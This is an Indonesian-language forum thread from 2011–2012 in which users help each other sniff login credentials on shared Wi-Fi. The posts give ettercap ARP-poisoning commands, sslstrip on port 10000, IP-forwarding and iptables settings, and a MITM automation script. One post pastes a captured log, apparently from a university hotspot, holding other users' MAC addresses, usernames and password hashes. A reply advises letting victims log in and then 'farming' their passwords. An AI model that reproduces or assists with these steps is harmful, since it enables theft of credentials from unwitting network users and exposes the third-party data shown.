09-22-2011, 05:42 PM
iya kak,.. dia memang bikin lag .. tapi bukan bandwidth internet selama kk scann di jaringan local .. tapi makan memori ..
09-22-2011, 05:42 PM
iya kak,.. dia memang bikin lag .. tapi bukan bandwidth internet selama kk scann di jaringan local .. tapi makan memori ..
10-08-2011, 08:06 AM
bisa nanya lagi kan ??
masih tentang ettercap di BT5 n R1 nya !!! detailnya seperti ini !! perintah yg sy masukkan Code: echo 1 > /proc/sys/net/ipv4/ip_forward lalu di browser host lain muncul peringatan ttg sertifikasi nya, seperti biasa jika di accept peringatannya maka password nya berhasil sy dapatkan, tapi klo gag di accept maka gag dapat donk kan !! lalu setelah sy beri tanda # pada iptables di /etc/etter.conf, seperti ini Code: # if you use iptables: lalu sy lakukan seperti langkah2 sy sebelumnya, peringatan sertifikasinya dah tidak ada lagi !!! TAPI... sy tidak mendapatkan user+pass yang diinputkan di site http/https !! jadi inti permasalahan sy itu om, sy tidak mendapatkan user+pass !! mohon dibantu yahh om ....
10-08-2011, 09:03 PM
Code: echo 1 > /proc/sys/net/ipv4/ip_forward kalo masalah ane gini,, ane sniff di mikrotik,, jadi karena di redirect ke port 10000 tuh user cuma muter2 login mikrotik,, jadi yang ane dapat cuma mac adrres victim,user n pass nya,,cus dt4 ane mesti daftarin macaddr dulu,, jadi password fb n dkk g pernah dapet,,bijimana donk?? hasilnya kira2 ini [spoiler] DHCP: [00:15:AF:A1:C9:7F] DISCOVER DHCP: [00:15:AF:A1:C9:7F] DISCOVER DHCP: [00:15:AF:A1:C9:7F] DISCOVER DHCP: [00:15:AF:A1:C9:7F] REQUEST 172.16.40.207 DHCP: [172.16.40.1] ACK : 0.0.0.0 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1 DHCP: [00:15:AF:A1:C9:7F] DISCOVER DHCP: [00:15:AF:A1:C9:7F] REQUEST 172.16.40.207 DHCP: [00:15:AF:A1:C9:7F] DISCOVER DHCP: [00:15:AF:A1:C9:7F] REQUEST 172.16.40.207 DHCP: [172.16.40.1] ACK : 0.0.0.0 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1 DHCP: [00:21:5C:0D:C8:8D] DISCOVER DHCP: [00:21:5C:0D:C8:8D] REQUEST 172.16.40.195 DHCP: [68:A3:C41:F47] REQUEST 172.16.40.94 DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75 DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75 DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1 DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1 DHCP: [00:1920:79:3A] REQUEST 172.16.40.225 DHCP: [E4:EC:10:B9:1D:41] DISCOVER DHCP: [E4:EC:10:B9:1D:41] REQUEST 172.16.40.135 DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75 DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75 DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1 DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1 HTTP : 172.16.40.1:80 -> USER: AJOANGGA PASS: 976a6db93beb8d78a06ec2ed63a04168 INFO: http://hotspot.***.ac.id/login HTTP : 172.16.40.1:80 -> USER: AJOANGGA PASS: 976a6db93beb8d78a06ec2ed63a04168 INFO: /login HTTP : 172.16.40.1:80 -> USER: frendy_johnnery PASS: c3c3c2a38cdceae7e61208721981a614 INFO: http://hotspot.***.ac.id/login?dst=http:...oo.com/con DHCP: [00:21:5C:0D:C8:8D] REQUEST 172.16.40.195 HTTP : 172.16.40.1:80 -> USER: frendy_johnnery PASS: c3c3c2a38cdceae7e61208721981a614 INFO: /login HTTP : 172.16.40.1:80 -> USER: AJOANGGA PASS: a7fcad4b5b67721b66755be39c9307b9 INFO: http://hotspot.***.ac.id/login HTTP : 172.16.40.1:80 -> USER: AJOANGGA PASS: a7fcad4b5b67721b66755be39c9307b9 INFO: /login HTTP : 172.16.40.1:80 -> USER: frendy_johnnery PASS: 6c26f6365379942ee1d9b1a6a55cf2e4 INFO: http://hotspot.***.ac.id/login HTTP : 172.16.40.1:80 -> USER: frendy_johnnery PASS: 6c26f6365379942ee1d9b1a6a55cf2e4 INFO: /login DHCP: [90:4C:E5:A3:66:01] DISCOVER DHCP: [90:4C:E5:A3:66:01] REQUEST 172.16.40.163 HTTP : 172.16.40.1:80 -> USER: AJOANGGA PASS: 75c20b8e09d4bfb2163fb336d0184948 INFO: http://hotspot.***.ac.id/login?dst=http:...ebook.com/ HTTP : 172.16.40.1:80 -> USER: AJOANGGA PASS: 75c20b8e09d4bfb2163fb336d0184948 INFO: /login DHCP: [00:22:68:A9:CC:58] DISCOVER DHCP: [00:22:68:A9:CC:58] REQUEST 172.16.40.150 HTTP : 172.16.40.1:80 -> USER: AJOANGGA PASS: 75c20b8e09d4bfb2163fb336d0184948 INFO: http://hotspot.***.ac.id/login?dst=http:...ebook.com/ DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75 DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75 DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1 DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1 DHCP: [C4:17:FE:AB:21:09] REQUEST 172.16.40.203 DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75 DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1 DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75 DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1 DHCP: [E4:EC:10:B9:1D:41] DISCOVER DHCP: [E4:EC:10:B9:1D:41] REQUEST 172.16.40.135 HTTP : 172.16.40.1:80 -> USER: frendy_johnnery PASS: 80e8c6efda5ea87f89c9835d9927b26f INFO: http://hotspot.***.ac.id/login HTTP : 172.16.40.1:80 -> USER: frendy_johnnery PASS: 80e8c6efda5ea87f89c9835d9927b26f INFO: /login DHCP: [68:A3:C41:F47] REQUEST 172.16.40.94 DHCP: [68:A3:C41:F47] REQUEST 172.16.40.94 DHCP: [90:4C:E5:A3:66:01] REQUEST 172.16.40.163 DHCP: [E0:B9:A5:17:8F:03] REQUEST 172.16.40.90 DHCP: [00:21:5C:0D:C8:8D] REQUEST 172.16.40.195 DHCP: [172.16.40.1] ACK : 0.0.0.0 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1 DHCP: [00:21:5C:0D:C8:8D] DISCOVER DHCP: [00:21:5C:0D:C8:8D] DISCOVER DHCP: [00:21:5C:0D:C8:8D] DISCOVER [\spoiler] itu beberapa user terulang karena mreka coba akses hotspot tapi g bisa keluar browsing karena pas mo browsing di direct ke port 10000,,jadi gimana ttuh??
10-08-2011, 09:45 PM
coba di direct ke port login mikrotiknya aja bro, biar bisa login mereka, setelah itu baru farming deh
I'm @ikonspirasi - Facebook
Personal blog: http://ikonspirasi.net
10-09-2011, 12:14 AM
om Konspirasi bisa bantu masalah sy yg diatas nda ??
atau teman2 yg lain ..... pleeeeeaseeee
10-09-2011, 12:26 AM
(10-08-2011, 09:45 PM)konspirasi Wrote: coba di direct ke port login mikrotiknya aja bro, biar bisa login mereka, setelah itu baru farming dehmereka itu udah bisa login mikrotik kok, setiap konekke wifi langsung auto direct ke login mikrotik nya kalo buka browser,stelah login langsung auto direct ke alamat yang ada di addres bar atau url homepage,, nah untuk menuju url yg di addres bar itu mreka g bisa coz udah di alihkan langsung ke port 100000 stelah login,, makanya cuma dapat pasword mikrotik aja,,ane udah utak atik port belum nemu lagi,, Quote:om Konspirasi bisa bantu masalah sy yg diatas nda ??om RR12 bisa mntak script sniff ful nya??ntar saya bantu cobain,,n cari solusi
10-09-2011, 12:58 AM
@ junior.riau18
maksud nya script yg mana om ????
10-09-2011, 03:30 AM
(10-09-2011, 12:14 AM)RR12 Wrote: om Konspirasi bisa bantu masalah sy yg diatas nda ?? maaf ga liat post pertamanya hehe yg ane tau klo mereka pake https itu harus pake certificate palsu atau hilangin https-nya pake sslstrip bro jadi yg udh dilakuin discript udh bener, cm arpspoof nya ane rasa ga perlu karena udh ada dari ettercap -M arp trus yg sslstrip -w sslstrip.log -k -p -l 10000 buat listening di port iptables yg udh disetting sebelumnya buat om junior.riau18 silahkan diganti juga dengan cara ini, klo masih belum berhasil post disini errornya lagi met mencoba
I'm @ikonspirasi - Facebook
Personal blog: http://ikonspirasi.net
10-28-2011, 07:15 PM
(09-05-2011, 01:00 PM)clowthu.ind Wrote: script om zee itu buat bt4r2.. Aneh cobak Pakek Script Diatas ko' gni yah Om hasilnya... No update available Script is installed _______ _______ _______ _______ _______ _____ ======================== = Welcome to Yet Another MITM Automation Script. = = Use this tool responsibly, and enjoy! = = Feel free to contribute and distribute this script as you please. = = Official thread : http://tinyurl.com/yamas-bt5 = = Check out the help (-h) to see new features and informations = = You are running version 0.9.9 = =========================================================================== Message of the day : [+] Cleaning iptables [-] Cleaned. [+] Activating IP forwarding... [-] Activated. [+] Configuring iptables... To what port should the traffic be redirected to? (default = 8080) Terus aneh cobak pakaek terminal di console : root@bt:~# ettercap -T -q -M arp -i wlan0 // // Ko tetep aja gak bisa nembus Om.. gmna Om solusinya..???
02-26-2012, 06:16 PM
pas jalanin ettercap -T -q -i wlan0 -M ARP // //
koq kayak gini yaa " SEND L3 ERROR: 309 byte packet (0800:06) destined to 207.112.46.13 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted) " padahal etter.conf nya udah di uncoment di bagian if you use iptables,, tapi setiap jalanin command ettercap di atas tadi pass n user gak pernah dapet,,, help.... |